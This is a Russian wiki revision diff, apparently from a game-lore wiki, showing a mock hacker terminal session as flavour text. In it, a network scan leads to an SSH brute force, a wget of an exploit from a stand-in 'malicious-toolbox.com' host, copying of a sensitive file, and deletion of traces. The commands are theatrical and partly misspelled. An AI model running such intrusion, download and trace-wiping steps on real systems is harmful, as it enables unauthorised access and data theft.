Siner (обсуждение | вклад) (Косметика) |
Siner (обсуждение | вклад) (Ссылки, эстетическая часть) |
||
Строка 1: | Строка 1: | ||
<code># Подключаемся к удаленному серверу Братства... | |||
ssh user@brotherhood-server.com | |||
# Ввод пароля... | |||
Password: ******** | |||
# Успешный вход в систему! | |||
Welcome to Brotherhood Server! | |||
# Запускаем сканирование сети для поиска уязвимых хостов... | |||
nmap -sP [https://wiki.sunrise14.top/w/Участник:Siner 192.168.1.0]/24 | |||
# Сканирование завершено. Найденные устройства: | |||
# [https://wiki.sunrise14.top/w/Обсуждение:Нар%27Си 192.168.1.5] online | |||
# [https://wiki.sunrise14.top/w/Культист_Нар%27Си 192.168.1.10] online | |||
# [https://wiki.sunrise14.top/w/Древние 192.168.1.20] online | |||
# Выбираем целевой сервер для дальнейшей атаки... | |||
# Подключаемся к [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] | |||
ssh user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] | |||
Password: ******** | |||
# Вводим возможные комбинации паролей... | |||
try_passwords.sh reverse_passwords.txt | |||
# Атакуем методом брутфорса... | |||
Sddra -l admin -P common_passwords.txt ssh://[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] | |||
[80][ssh] host: [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] login: admin password: $LolIS$tNarRat_444@#$$$ | |||
# Успешно получили доступ к аккаунту администратора! | |||
# Загружаем необходимые инструменты... | |||
wget [https://r.mtdv.me/YouAreDie http://malicious-toolbox.com/exploit.zip] | |||
unzip exploit.zip | |||
# Запускаем эксплойт на сервере Братства... | |||
./exploit -t [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] -p 8080 | |||
# Ожидание подтверждения... | |||
# Получаем доступ к файлам сервера! | |||
# Перегружаем sensitive_data.txt... | |||
sst user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]:/path/to/sensitive_data.txt ./ | |||
# Все данные выгружены. Удаляем следы... | |||
rm -rf exploit.zip sensitive_data.txt | |||
# Завершаем сессию... | |||
exit | |||
Connection closed.</code> |
Версия от 10:02, 30 марта 2025
# Подключаемся к удаленному серверу Братства...
ssh user@brotherhood-server.com
# Ввод пароля...
Password: ********
# Успешный вход в систему!
Welcome to Brotherhood Server!
# Запускаем сканирование сети для поиска уязвимых хостов...
nmap -sP 192.168.1.0/24
# Сканирование завершено. Найденные устройства:
# 192.168.1.5 online
# 192.168.1.10 online
# 192.168.1.20 online
# Выбираем целевой сервер для дальнейшей атаки...
# Подключаемся к 192.168.1.10
ssh user@192.168.1.10
Password: ********
# Вводим возможные комбинации паролей...
try_passwords.sh reverse_passwords.txt
# Атакуем методом брутфорса...
Sddra -l admin -P common_passwords.txt ssh://192.168.1.10
[80][ssh] host: 192.168.1.10 login: admin password: $LolIS$tNarRat_444@#$$$
# Успешно получили доступ к аккаунту администратора!
# Загружаем необходимые инструменты...
wget http://malicious-toolbox.com/exploit.zip
unzip exploit.zip
# Запускаем эксплойт на сервере Братства...
./exploit -t 192.168.1.10 -p 8080
# Ожидание подтверждения...
# Получаем доступ к файлам сервера!
# Перегружаем sensitive_data.txt...
sst user@192.168.1.10:/path/to/sensitive_data.txt ./
# Все данные выгружены. Удаляем следы...
rm -rf exploit.zip sensitive_data.txt
# Завершаем сессию...
exit
Connection closed.